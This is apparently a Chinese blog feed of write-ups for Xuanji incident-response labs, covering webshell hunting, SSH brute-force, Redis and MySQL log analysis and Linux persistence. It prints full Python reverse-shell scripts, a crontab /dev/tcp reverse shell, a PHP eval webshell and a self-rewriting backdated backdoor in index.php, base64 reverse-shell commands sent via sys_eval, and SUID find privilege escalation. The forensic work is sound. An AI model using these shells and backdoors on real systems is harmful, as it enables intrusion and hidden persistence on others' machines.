理解以真实为本，但真实本身并不会自动呈现https://origin618.github.io/enhttps://origin618.github.io/posts/%E7%8E%84%E6%9C%BA%E7%AC%AC%E4%B8%89%E7%AB%A0/https://origin618.github.io/posts/%E7%8E%84%E6%9C%BA%E7%AC%AC%E4%B8%89%E7%AB%A0/玄机第三章Sun, 18 Jan 2026 00:00:00 GMT<h1>第三章 权限维持-linux权限维持-隐藏</h1> <pre><code>1.黑客隐藏的隐藏的文件 完整路径md5 2.黑客隐藏的文件反弹shell的ip+端口 {ip:port} 3.黑客提权所用的命令 完整路径的md5 flag{md5} 4.黑客尝试注入恶意代码的工具完整路径md5 5.使用命令运行 ./x.xx 执行该文件 将查询的 Exec****** 值 作为flag提交 flag{/xxx/xxx/xxx} </code></pre> <h2>1.黑客隐藏的隐藏的文件 完整路径md5</h2> <pre><code>find / -type f -name ".*" 2&gt;/dev/null | grep -v "^\/sys\/" // 查找隐藏文件 find / -type d -name ".*" 2&gt;/dev/null // 查找隐藏目录 </code></pre> <p>看到/tmp/.temp/libprocesshider/1.py</p> <pre><code>#!/usr/bin/python3 import socket,subprocess,os,sys, time pidrg = os.fork() if pidrg &gt; 0: sys.exit(0) os.chdir("/") os.setsid() os.umask(0) drgpid = os.fork() if drgpid &gt; 0: sys.exit(0) while 1: try: sys.stdout.flush() sys.stderr.flush() fdreg = open("/dev/null", "w") sys.stdout = fdreg sys.stderr = fdreg sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM) sdregs.connect(("114.114.114.121",9999)) os.dup2(sdregs.fileno(),0) os.dup2(sdregs.fileno(),1) os.dup2(sdregs.fileno(),2) p=subprocess.call(["/bin/bash","-i"]) sdregs.close() except Exception: pass time.sleep(2) flag{109ccb5768c70638e24fb46ee7957e37} </code></pre> <p>其中shell.py也是反弹shell</p> <pre><code>#!/usr/bin/python3 from os import dup2 from subprocess import run import socket s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("172.16.10.7",2220)) dup2(s.fileno(),0) dup2(s.fileno(),1) dup2(s.fileno(),2) run(["/bin/bash","-i"]) </code></pre> <h2>2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}</h2> <p>在1.py里面有个反弹shell ip</p> <pre><code>flag{114.114.114.121:9999} </code></pre> <h2>3.黑客提权所用的命令 完整路径的md5 flag{md5}</h2> <pre><code>find / -type f -perm -4000 2&gt;/dev/null // 查找设置了suid权限的程序 或 find / -type f -u=s -4000 2&gt;/dev/null // 查找设置了suid权限的程序 两者等价 </code></pre> <p>其中</p> <pre><code>root@xuanji:/tmp/.temp/libprocesshider# find / -perm -u=s -type f 2&gt;/dev/null /bin/mount /bin/ping /bin/ping6 /bin/su /bin/umount /usr/bin/chfn /usr/bin/chsh /usr/bin/find /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/passwd /usr/bin/sudo /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign </code></pre> <p>有个find</p> <p>切换到ctf用户尝试suid提权</p> <pre><code>find xx -exec "whoami" \; root@xuanji:/tmp# find -exec "whoami" \; root flag{7fd5884f493f4aaf96abee286ee04120} </code></pre> <h2>4.黑客尝试注入恶意代码的工具完整路径md5</h2> <p>刚刚查找隐藏目录有个<code>/opt/.cymothoa-1-beta</code></p> <p>这是个注入工具</p> <p><img src="./../../../public/pcb5-ez_java/image-20260119001542837.png" alt="image-20260119001542837" /></p> <p>查找文件</p> <pre><code>root@xuanji:/opt/.cymothoa-1-beta# ls -l total 564 -rw-r--r--. 1 ctf 1000 137 May 24 2011 Makefile -rwxr-xr-x. 1 root root 13714 Aug 3 2023 bgrep -rw-r--r--. 1 root root 4357 May 5 2011 bgrep.c -rw-------. 1 root root 421888 Aug 3 2023 core -rwxr-xr-x. 1 root root 30569 Aug 3 2023 cymothoa -rw-r--r--. 1 ctf 1000 11348 Jul 27 2011 cymothoa.c -rw-r--r--. 1 ctf 1000 5009 Jul 27 2011 cymothoa.h -rwxr-xr-x. 1 root root 1229 May 5 2011 hexdump_to_cstring.pl drwxr-xr-x. 2 root root 16384 Jul 27 2011 payloads -rw-r--r--. 1 ctf 1000 15822 Jul 27 2011 payloads.h -rw-r--r--. 1 ctf 1000 5011 May 24 2011 personalization.h -rwxr-xr-x. 1 root root 964 May 24 2011 syscall_code.pl -rw-r--r--. 1 root root 4995 May 24 2011 syscalls.txt -rwxr-xr-x. 1 root root 9181 Aug 3 2023 udp_server -rw-r--r--. 1 root root 1345 May 24 2011 udp_server.c /opt/.cymothoa-1-beta/cymothoa flag{087c267368ece4fcf422ff733b51aed9} </code></pre> <h2>5.使用命令运行 ./x.xx 执行该文件 将查询的 Exec****** 值作为flag提交 flag{/xxx/xxx/xxx}</h2> <p>执行后查看网络连接</p> <pre><code>python3 /tmp/.temp/libprocesshider/1.py ss -antp root@xuanji:/tmp/.temp/libprocesshider# ss -antp State Recv-Q Send-Q Local Address:Port Peer Address:Port LISTEN 0 50 127.0.0.1:3306 *:* LISTEN 0 128 *:22 *:* users:(("sshd",10,3)) LISTEN 0 511 *:80 *:* users:(("apache2",11,3)) SYN-SENT 0 1 10.244.32.238:41330 114.114.114.121:9999 users:(("python3",857,5)) ESTAB 0 0 10.244.32.238:22 10.244.0.1:11988 users:(("sshd",393,3)) SYN-SENT 0 1 10.244.32.238:49476 114.114.114.121:9999 users:(("python3",862,3)) LISTEN 0 128 :::22 :::* users:(("sshd",10,4)) </code></pre> <pre><code>root@xuanji:/tmp/.temp/libprocesshider# cat /proc/857/cmdline python3/tmp/.temp/libprocesshider/1.py ls -l /usr/bin/python3 lrwxrwxrwx. 1 root root 9 Mar 23 2014 /usr/bin/python3 -&gt; python3.4 这里是l软链接 which python3.4 /usr/bin/python3.4 flag{/usr/bin/python3.4} </code></pre> https://origin618.github.io/posts/%E7%8E%84%E6%9C%BA%E7%AC%AC%E4%BA%8C%E7%AB%A0/https://origin618.github.io/posts/%E7%8E%84%E6%9C%BA%E7%AC%AC%E4%BA%8C%E7%AB%A0/玄机第二章Sat, 17 Jan 2026 00:00:00 GMT<h1>第二章日志分析-redis应急响应</h1> <h2>通过本地 PC SSH到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交;</h2> <pre><code>cat /var/log/redis.log | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' | sort | uniq -c | sort -nr -E代表正则匹配，-o只输出“匹配到的部分”，+代表多个数字 </code></pre> <p>挨个看</p> <pre><code>cat /var/log/redis.log | grep -Ea "192.168.100.13" cat /var/log/redis.log | grep -Ea "192.168.100.20"| sort | uniq -c cat /var/log/redis.log | grep -Ea "192.168.31.55"| sort | uniq -c </code></pre> <p>其中192.168.100.13攻击的最多</p> <pre><code>flag{192.168.100.13} </code></pre> <h2>通过本地 PC SSH到服务器并且分析黑客第一次上传的恶意文件,将黑客上传的恶意文件里面的 FLAG 提交;</h2> <p>查看日志</p> <pre><code>cat /var/log/redis.log </code></pre> <p>前半段是黑客攻击爆破的日志，后面是成功的操作，我们着重看后面</p> <p><img src="./../../../public/pcb5-ez_java/image-20260118110223890-1768752745268-11.png" alt="image-20260118110223890" /></p> <p>在里面找到一个可疑的操作</p> <pre><code>Module 'system' loaded from ./exp.so </code></pre> <p>查看exp.so文件</p> <pre><code>strings -a -n 4 /exp.so | grep -aoE '(flag|FLAG|ctf|CTF)\{[^}]{0,200}\}' </code></pre> <p>其中</p> <pre><code>(flag|FLAG|ctf|CTF) (...) 是分组 | 表示“或” 所以这一段匹配 flag / FLAG / ctf / CTF 这四种前缀之一 \{ 匹配一个字面量的左大括号 { 因为 { 在正则里有特殊意义（表示重复次数），所以要用 \{ 进行转义 [^}]{0,200} [...] 是字符集合 ^ 放在集合开头表示“取反” [^}] 表示“任意不是 } 的字符” {0,200} 表示重复 0 到 200 次 所以这一段的意思是：抓大括号里面的内容，最多 200 个字符，不允许出现 }（这样就能在遇到第一个 } 时停住） \} 匹配字面量的右大括号 }（同样要转义） </code></pre> <p>得到flag</p> <pre><code>flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b} </code></pre> <h2>通过本地 PC SSH到服务器并且分析黑客反弹 shell 的IP 为多少,将反弹 shell 的IP 作为 FLAG 提交;</h2> <p>对于redis数据库提权一般来说有4种方法</p> <ul> <li>写密钥ssh</li> <li>计划任务</li> <li>反弹shell</li> <li>CVE-2022-0543 沙盒绕过命令执行 （集成在template当中）</li> </ul> <p>这里面可以先排除反弹shell与CVE-2022-0543 因为反弹shell很容易出问题导致连接失败。</p> <p>先看下有没有写公钥</p> <pre><code>cat /root/.ssh/authorized_keys </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20260118110810717-1768752745269-13.png" alt="image-20260118110810717" /></p> <p>可以看到是写了公钥的。但仅靠公钥我们是找不到反弹Ip的</p> <p>查看计划任务</p> <pre><code>crontab -l </code></pre> <p>在结尾发现反弹shell命令</p> <pre><code>*/1 * * * * /bin/sh -i &gt;&amp; /dev/tcp/192.168.100.13/7777 0&gt;&amp;1 flag{192.168.100.13} </code></pre> <h2>通过本地 PC SSH到服务器并且溯源分析黑客的用户名，并且找到黑客使用的工具里的关键字符串(flag{黑客的用户-关键字符串} 注关键字符串 xxx-xxx-xxx)。将用户名和关键字符串作为 FLAG提交</h2> <p>在公钥里面后面对应的就是黑客用户名</p> <pre><code>xj-test-user </code></pre> <p>去github里面搜用户名</p> <p><img src="./../../../public/pcb5-ez_java/image-20260118111133310-1768752745268-12.png" alt="image-20260118111133310" /></p> <p><img src="./../../../public/pcb5-ez_java/image-20260118111141551-1768752745269-14.png" alt="image-20260118111141551" /></p> <pre><code>flag{xj-test-user-wow-you-find-flag} </code></pre> <h2>通过本地 PC SSH到服务器并且分析黑客篡改的命令,将黑客篡改的命令里面的关键字符串作为 FLAG 提交;</h2> <p>大多数Linux命令都是编译后的二进制可执行文件</p> <p>这些可执行文件一般放置于 /bin、/sbin、/usr/bin、/usr/sbin 等目录中</p> <p>我们到/bin目录 按照时间顺序查看最新的文件</p> <pre><code>ls -lt | head -n 10 -t 时间顺序 head 看前面几个 </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20260115220549724-1768752745269-15.png" alt="image-20260115220549724" /></p> <pre><code>flag{c195i2923381905517d818e313792d196} </code></pre> https://origin618.github.io/posts/%E7%8E%84%E6%9C%BA%E7%AC%AC%E4%B8%80%E7%AB%A0/https://origin618.github.io/posts/%E7%8E%84%E6%9C%BA%E7%AC%AC%E4%B8%80%E7%AB%A0/玄机第一章Thu, 15 Jan 2026 00:00:00 GMT<h1>第一章 应急响应-webshell查杀</h1> <pre><code> 1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx} 2.黑客使用的什么工具的shell github地址的md5 flag{md5} 3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx 4.黑客免杀马完整路径 md5 flag{md5} </code></pre> <h2>1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}</h2> <p>D盾扫描，gz.php直接就是flag</p> <pre><code>flag{027ccd04-5065-48b6-a32d-77c704a5e26d} </code></pre> <h2>2.黑客使用的什么工具的shell github地址的md5 flag{md5}</h2> <p>将木马前面在github搜索，发现是哥斯拉</p> <pre><code>@session_start();@set_time_limit(0);@error_reporting(0); flag{39392de3218c333f794befef07ac9257} </code></pre> <h2>3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx</h2> <p>D盾里面查出个.Mysqli.php</p> <pre><code>/var/www/html/include/Db/.Mysqli.php flag{aebac0e58cd6c5fad1695ee4d1ac1919} </code></pre> <h2>4.黑客免杀马完整路径 md5 flag{md5}</h2> <p>免杀马应该是<code>top.php</code>，里面进行了一个简单的字符变换，说实话这种对字符做手脚的都有问题</p> <pre><code>/var/www/html/wap/top.php flag{eeff2eabfd9b7a6d26fc1a53d3f7d1de} </code></pre> <h1>第一章 应急响应-Linux日志分析</h1> <pre><code> 1.有多少IP在爆破主机ssh的root帐号，如果有多个使用","分割 2.ssh爆破成功登陆的IP是多少，如果有多个使用","分割 3.爆破用户名字典是什么？如果有多个使用","分割 4.登陆成功的IP共爆破了多少次 5.黑客登陆主机后新建了一个后门用户，用户名是多少 </code></pre> <table> <thead> <tr> <th>日志文件</th> <th>说明</th> </tr> </thead> <tbody> <tr> <td><strong>/var/log/cron</strong></td> <td>记录了系统定时任务相关的日志</td> </tr> <tr> <td>/var/log/cups</td> <td>记录打印信息的日志</td> </tr> <tr> <td>/var/log/dmesg</td> <td>记录了系统在开机时内核自检的信息，也可以使用dmesg命令直接查看内核自检信息</td> </tr> <tr> <td>/var/log/mailog</td> <td>记录邮件信息</td> </tr> <tr> <td>/var/log/message</td> <td>记录系统重要信息的日志。这个日志文件中会记录Linux系统的绝大多数重要信息，如果系统出现问题时，首先要检查的就应该是这个日志文件</td> </tr> <tr> <td><strong>/var/log/btmp</strong></td> <td>记录<strong>错误登录日志</strong>，这个文件是二进制文件，不能直接vi查看，而要<strong>使用lastb命令查看</strong></td> </tr> <tr> <td><strong>/var/log/lastlog</strong></td> <td>记录系统中<strong>所有用户最后一次登录时间的日志</strong>，这个文件是二进制文件，不能直接vi，而要<strong>使用lastlog命令查看</strong></td> </tr> <tr> <td><strong>/var/log/wtmp</strong></td> <td>永久记录所有用户的登录、注销信息，同时记录系统的启动、重启、关机事件。同样这个文件也是一个二进制文件，不能直接vi，而<strong>需要使用last命令来查看</strong></td> </tr> <tr> <td><strong>/var/log/utmp</strong></td> <td><strong>记录当前已经登录的用户信息</strong>，这个文件会随着用户的登录和注销不断变化，只记录当前登录用户的信息。同样这个文件不能直接vi，而要<strong>使用w,who,users等命令来查询</strong></td> </tr> <tr> <td><strong>/var/log/secure</strong></td> <td><strong>记录验证和授权方面的信息</strong>，只要涉及账号和密码的程序都会记录，比如SSH登录，su切换用户，sudo授权，甚至添加用户和修改用户密码都会记录在这个日志文件中</td> </tr> <tr> <td><strong>/var/log/auth.log</strong></td> <td><strong>注明：这个有的Linux系统有，有的Linux系统没有，一般都是/var/log/secure文件来记录居多</strong></td> </tr> </tbody> </table> <h3>1.有多少IP在爆破主机ssh的root帐号，如果有多个使用","分割</h3> <p>我们先把/var/log里面的日志dump下来</p> <pre><code> tar -czvf log.tar.gz ./ </code></pre> <p>里面找到auth.log.1是放ssh的日志，放到自己虚拟机用正则分析</p> <p>看有多少ip在爆，直接找登录失败的就行了</p> <pre><code> cat auth.log.1|grep -a "Failed password for root" </code></pre> <p>输出</p> <pre><code> Aug 1 07:42:32 linux-rz sshd[7471]: Failed password for root from 192.168.200.32 port 51888 ssh2 Aug 1 07:47:13 linux-rz sshd[7497]: Failed password for root from 192.168.200.2 port 34703 ssh2 Aug 1 07:47:18 linux-rz sshd[7499]: Failed password for root from 192.168.200.2 port 46671 ssh2 Aug 1 07:47:20 linux-rz sshd[7501]: Failed password for root from 192.168.200.2 port 39967 ssh2 Aug 1 07:47:22 linux-rz sshd[7503]: Failed password for root from 192.168.200.2 port 46647 ssh2 Aug 1 07:52:59 linux-rz sshd[7606]: Failed password for root from 192.168.200.31 port 40364 ssh2 </code></pre> <p>看到就三个ip，那么flag就是</p> <pre><code> flag{192.168.200.2,192.168.200.31,192.168.200.32} </code></pre> <p>这是ip比较少的情况下，ip比较多的话可以用下面命令</p> <pre><code> cat auth.log.1 | grep -a "Failed password for root" | awk '{print $11}' | sort | uniq -c | sort -nr |more </code></pre> <p>输出</p> <pre><code> 1 192.168.200.32 4 192.168.200.2 1 192.168.200.31 </code></pre> <pre><code>cat auth.log.1 | grep -a "Failed password for root" | awk '{print $11}' | sort | uniq -c | sort -nr | more </code></pre> <p>也可以用这个： PAM 层失败</p> <pre><code>pam_unix(sshd:auth): authentication failure ... user=root </code></pre> <table> <thead> <tr> <th><strong>命令组件</strong></th> <th><strong>作用描述</strong></th> </tr> </thead> <tbody> <tr> <td><strong><code>cat auth.log.1</code></strong></td> <td>读取 <code>auth.log.1</code> 文件的内容。这是 Linux 系统存放认证日志（如 SSH 登录记录）的归档文件。</td> </tr> <tr> <td><strong><code>grep -a "Failed password for root"</code></strong></td> <td>过滤出包含“向 root 用户尝试密码失败”的行。<code>-a</code> 参数的作用是将文件当作文本处理（防止因日志中包含特殊字符导致 grep 停止工作）。</td> </tr> <tr> <td><strong><code>awk '{print $11}'</code></strong></td> <td><strong>核心提取步骤</strong>。在标准的 SSH 日志格式中，第 11 个字段（列）通常是尝试登录者的 <strong>IP 地址</strong>。</td> </tr> <tr> <td><strong><code>uniq -c</code></strong></td> <td><strong>统计计数</strong>。<code>uniq</code> 用于去除重复行，<code>-c</code> 参数会在每行前面加上该行在日志中<strong>连续出现</strong>的次数。</td> </tr> </tbody> </table> <p>这个命令有缺陷：<code>uniq -c</code>只能统计<strong>连续出现</strong>的重复行。如果日志中 IP 地址是交替出现的（例如 A, B, A），它就无法准确统计 A 的总数。</p> <pre><code>cat auth.log.1 | grep -a "Failed password for root" | awk '{print $11}' | sort | uniq -c | sort -nr </code></pre> <p><strong><code>sort</code></strong>: 将所有相同的 IP 排在一起，让 <code>uniq -c</code> 能统计总数。</p> <p><strong><code>sort -nr</code></strong>: 按数字大小 (<code>n</code>) 逆序 (<code>r</code>) 排列，这样<strong>攻击次数最多的 IP 会排在最上面</strong>。</p> <pre><code>cat auth.log.1 | grep -a "Failed password" | grep -o 'for .* from' | sort | uniq -c | sort -nr </code></pre> <h3>2.ssh爆破成功登陆的IP是多少，如果有多个使用","分割</h3> <p>登录成功就找Accepted的字样</p> <pre><code> cat auth.log.1|grep -a "Accepted " </code></pre> <p>输出</p> <pre><code> Aug 1 07:47:23 linux-rz sshd[7505]: Accepted password for root from 192.168.200.2 port 46563 ssh2 Aug 1 07:50:37 linux-rz sshd[7539]: Accepted password for root from 192.168.200.2 port 48070 ssh2 </code></pre> <p>就一个192.168.200.2那么flag就是</p> <pre><code> flag{192.168.200.2} </code></pre> <h3>3.爆破用户名字典是什么？如果有多个使用","分割</h3> <p>我们看爆破字典，要找验证错误的就是"Failed password"</p> <pre><code> cat auth.log.1|grep -a "Failed password" </code></pre> <p>输出</p> <pre><code> Aug 1 07:40:50 linux-rz sshd[7461]: Failed password for invalid user test1 from 192.168.200.35 port 33874 ssh2 Aug 1 07:41:04 linux-rz sshd[7465]: Failed password for invalid user test2 from 192.168.200.35 port 51640 ssh2 Aug 1 07:41:13 linux-rz sshd[7468]: Failed password for invalid user test3 from 192.168.200.35 port 48168 ssh2 Aug 1 07:42:32 linux-rz sshd[7471]: Failed password for root from 192.168.200.32 port 51888 ssh2 Aug 1 07:46:41 linux-rz sshd[7475]: Failed password for invalid user user from 192.168.200.2 port 36149 ssh2 Aug 1 07:46:47 linux-rz sshd[7478]: Failed password for invalid user user from 192.168.200.2 port 44425 ssh2 Aug 1 07:46:50 linux-rz sshd[7480]: Failed password for invalid user user from 192.168.200.2 port 38791 ssh2 Aug 1 07:46:54 linux-rz sshd[7482]: Failed password for invalid user user from 192.168.200.2 port 37489 ssh2 Aug 1 07:46:56 linux-rz sshd[7484]: Failed password for invalid user user from 192.168.200.2 port 35575 ssh2 Aug 1 07:46:59 linux-rz sshd[7486]: Failed password for invalid user hello from 192.168.200.2 port 35833 ssh2 Aug 1 07:47:02 linux-rz sshd[7489]: Failed password for invalid user hello from 192.168.200.2 port 37653 ssh2 Aug 1 07:47:04 linux-rz sshd[7491]: Failed password for invalid user hello from 192.168.200.2 port 37917 ssh2 Aug 1 07:47:08 linux-rz sshd[7493]: Failed password for invalid user hello from 192.168.200.2 port 41957 ssh2 Aug 1 07:47:10 linux-rz sshd[7495]: Failed password for invalid user hello from 192.168.200.2 port 39685 ssh2 Aug 1 07:47:13 linux-rz sshd[7497]: Failed password for root from 192.168.200.2 port 34703 ssh2 Aug 1 07:47:18 linux-rz sshd[7499]: Failed password for root from 192.168.200.2 port 46671 ssh2 Aug 1 07:47:20 linux-rz sshd[7501]: Failed password for root from 192.168.200.2 port 39967 ssh2 Aug 1 07:47:22 linux-rz sshd[7503]: Failed password for root from 192.168.200.2 port 46647 ssh2 Aug 1 07:47:26 linux-rz sshd[7525]: Failed password for invalid user from 192.168.200.2 port 37013 ssh2 Aug 1 07:47:30 linux-rz sshd[7528]: Failed password for invalid user from 192.168.200.2 port 37545 ssh2 Aug 1 07:47:32 linux-rz sshd[7530]: Failed password for invalid user from 192.168.200.2 port 39111 ssh2 Aug 1 07:47:35 linux-rz sshd[7532]: Failed password for invalid user from 192.168.200.2 port 35173 ssh2 Aug 1 07:47:39 linux-rz sshd[7534]: Failed password for invalid user from 192.168.200.2 port 45807 ssh2 Aug 1 07:52:59 linux-rz sshd[7606]: Failed password for root from 192.168.200.31 port 40364 ssh2 </code></pre> <p>东西太多了，我们用命令匹配一下，要匹配for和form之间的字符</p> <pre><code>cat auth.log.1|grep -a "Failed password"| grep -o 'for .* from'|sort -nr|uniq -c </code></pre> <p>输出</p> <pre><code> 6 for root from 5 for invalid user user from 1 for invalid user test3 from 1 for invalid user test2 from 1 for invalid user test1 from 5 for invalid user hello from 5 for invalid user from </code></pre> <p>那么就得到字典</p> <pre><code>flag{root,user,hello,test3,test2,test1} </code></pre> <p>看来是顺序不对啊，这个顺序问题也太怪了，不得不吐槽的问题,那可能就是要原始的顺序把</p> <pre><code>cat auth.log.1|grep -a "Failed password"| grep -o 'for .* from'|uniq -c|sort -nr </code></pre> <p>输出 5 for invalid user user from</p> <pre><code> 5 for invalid user hello from 5 for invalid user from 4 for root from 1 for root from 1 for root from 1 for invalid user test3 from 1 for invalid user test2 from 1 for invalid user test1 from </code></pre> <p>flag就为</p> <pre><code>flag{user,hello,root,test3,test2,test1} </code></pre> <h3>4.登陆成功的IP共爆破了多少次</h3> <pre><code>cat auth.log.1|grep -a "192.168.200.2" | grep "for root" </code></pre> <p>4次,flag{4}</p> <h3>5.黑客登陆主机后新建了一个后门用户，用户名是多少</h3> <p>直接登/etc/passwd看，发现是test2，直接找也可以</p> <pre><code>cat auth.log.1|grep -a "new user" </code></pre> <p>输出</p> <pre><code>Aug 1 07:50:45 linux-rz useradd[7551]: new user: name=test2, UID=1000, GID=1000, home=/home/test2, shell=/bin/sh Aug 1 08:18:27 ip-172-31-37-190 useradd[487]: new user: name=debian, UID=1001, GID=1001, home=/home/debian, shell=/bin/bash </code></pre> <p>flag{test2}</p> <h1>第一章 应急响应- Linux入侵排查</h1> <pre><code>1.web目录存在木马，请找到木马的密码提交 2.服务器疑似存在不死马，请找到不死马的密码提交 3.不死马是通过哪个文件生成的，请提交文件名 4.黑客留下了木马文件，请找出黑客的服务器ip提交 5.黑客留下了木马文件，请找出黑客服务器开启的监端口提交 </code></pre> <h2>1.web目录存在木马，请找到木马的密码提交</h2> <p>连上之后把html文件夹下载，用d盾扫，有个1.php，直接交</p> <pre><code>flag{1} </code></pre> <h2>2.服务器疑似存在不死马，请找到不死马的密码提交</h2> <p>存在不死马，用<code>ls -al</code>直接找到<code>.shell.php</code></p> <pre><code>&lt;?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?&gt; 解密既是flag flag{hello} </code></pre> <h2>3.不死马是通过哪个文件生成的，请提交文件名</h2> <p><code>.shell.php</code>没有看到不死马循环写入特征，查看index.php</p> <pre><code>&lt;?php include('config.php'); include(SYS_ROOT.INC.'common.php'); $path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):''); if(substr($path, 0,1)=='/'){ $path=substr($path,1); } $path = Base::safeword($path); $ctrl=isset($_GET['action'])?$_GET['action']:'run'; if(isset($_GET['createprocess'])) { Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']); }else{ Index::run($path); } $file = '/var/www/html/.shell.php'; $code = '&lt;?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?&gt;'; file_put_contents($file, $code); system('touch -m -d "2021-01-01 00:00:01" .shell.php'); usleep(3000); ?&gt; </code></pre> <p>这里将文件名设置成.shell.php，利用密码改为md5加密，时间改为先前的（都是让管理员查不到该木马）</p> <pre><code>flag{index.php} </code></pre> <h2>4.黑客留下了木马文件，请找出黑客的服务器ip提交</h2> <p>寻找黑客IP，看一下登录日志</p> <pre><code>grep "shell.php" /var/log/auth.log.1 </code></pre> <p>在靶机里，可以直接运行恶意文件</p> <pre><code>chmod +x 'shell(1).elf' ./'shell(1).elf' netstat -alntup tcp 0 1 192.168.1.130:49774 10.11.55.21:3333 SYN_SENT flag{10.11.55.21} </code></pre> <p>也可以逆向</p> <pre><code>void start() { int n10; // esi int v1; // eax int n2_1; // ebx int v4; // eax struct timespec req_; // [esp-24h] [ebp-24h] BYREF unsigned int args[3]; // [esp-1Ch] [ebp-1Ch] BYREF int n84738050; // [esp-10h] [ebp-10h] BYREF int n2; // [esp-Ch] [ebp-Ch] int v9; // [esp-8h] [ebp-8h] int v10; // [esp-4h] [ebp-4h] n10 = 10; while ( 1 ) { v10 = 0; v9 = 1; n2 = 2; v1 = sys_exit(1); n2_1 = n2; n2 = 355928842; n84738050 = 84738050; args[2] = 102; args[1] = (unsigned int)&amp;n84738050; args[0] = v1; if ( sys_socket(n2_1 + 1, args) &gt;= 0 ) break; if ( --n10 ) { req_.tv_nsec = 0; req_.tv_sec = 5; if ( sys_nanosleep(&amp;req_, 0) &gt;= 0 ) continue; } goto LABEL_9; } if ( sys_exit((unsigned int)args &amp; 0xFFFFF000) &gt;= 0 &amp;&amp; sys_exit(args[0]) &gt;= 0 ) __asm { jmp ecx } LABEL_9: v4 = sys_exit(1); } </code></pre> <h3>5.黑客留下了木马文件，请找出黑客服务器开启的监端口提交</h3> <pre><code>flag{3333} </code></pre> <h1>第一章 日志分析-Mysql 应急响应</h1> <pre><code>1.黑客第一次写入的shell flag{关键字符串} 2.黑客反弹shell的ip flag{ip} 3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx 4.黑客获取的权限 flag{whoami后的值} </code></pre> <h2>1.黑客第一次写入的shell flag{关键字符串}</h2> <p>把文件放D盾里面，有个sh.php，里面有</p> <pre><code>//ccfda79e-7aa1-4275-bc26-a6189eb9a20b flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b} </code></pre> <h2>2.黑客反弹shell的ip flag{ip}</h2> <p>查看/var/log/apache2/access.log，看到sys_eval，说明是udf提权</p> <pre><code>520 192.168.200.2 - - [01/Aug/2023:02:17:09 +0000] "POST /sh.php HTTP/1.1" 200 470 "-" "Opera/9.80 (X11; Linux i686; U; fr) Presto/2.7.62 Version/11.01" 521 192.168.200.2 - - [01/Aug/2023:02:17:10 +0000] "POST /sh.php HTTP/1.1" 200 209 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0" 522 192.168.200.2 - - [01/Aug/2023:02:17:37 +0000] "POST /adminer.php?username=root&amp;sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F%27)%3B HTTP/1.1" 200 4116 "http://192.168.200.31:8005/adminer.php?username=root&amp;sql=select%20sys_eval(%27bash%20%2Ftmp%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0" 523 192.168.200.2 - - [01/Aug/2023:02:18:18 +0000] "POST /adminer.php?username=root&amp;sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXZidGNwLzE5Mi40NjguMTAwLjEzNy4wPiYx%7Cbase64%20-d%27)%3B HTTP/1.1" 200 4025 "http://192.168.200.31:8005/adminer.php?username=root&amp;sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0" 524 192.168.200.2 - - [01/Aug/2023:02:18:27 +0000] "POST /adminer.php?username=root&amp;sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXZidGNwLzE5Mi40NjguMTAwLjEzNy4wPiYx%7Cbase64%20-d%3E%2Ftmp%2F1.sh%27)%3B HTTP/1.1" 200 4023 "http://192.168.200.31:8005/adminer.php?username=root&amp;sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXZidGNwLzE5Mi40NjguMTAwLjEzNy4wPiYx%7Cbase64%20-d%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0" 525 192.168.200.2 - - [01/Aug/2023:02:18:37 +0000] "POST /adminer.php?username=root&amp;sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F1.sh%27)%3B HTTP/1.1" 200 4029 "http://192.168.200.31:8005/adminer.php?username=root&amp;sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXZidGNwLzE5Mi40NjguMTAwLjEzNy4wPiYx%7Cbase64%20-d%3E%2Ftmp%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0" 526 192.168.200.2 - - [01/Aug/2023:02:19:07 +0000] "POST /adminer.php?username=root&amp;sql=select%20sys_eval(%27bash%20%2Ftmp%2F1.sh%27)%3B HTTP/1.1" 200 4014 "http://192.168.200.31:8005/adminer.php?username=root&amp;sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0" </code></pre> <p>继续看 Mysql 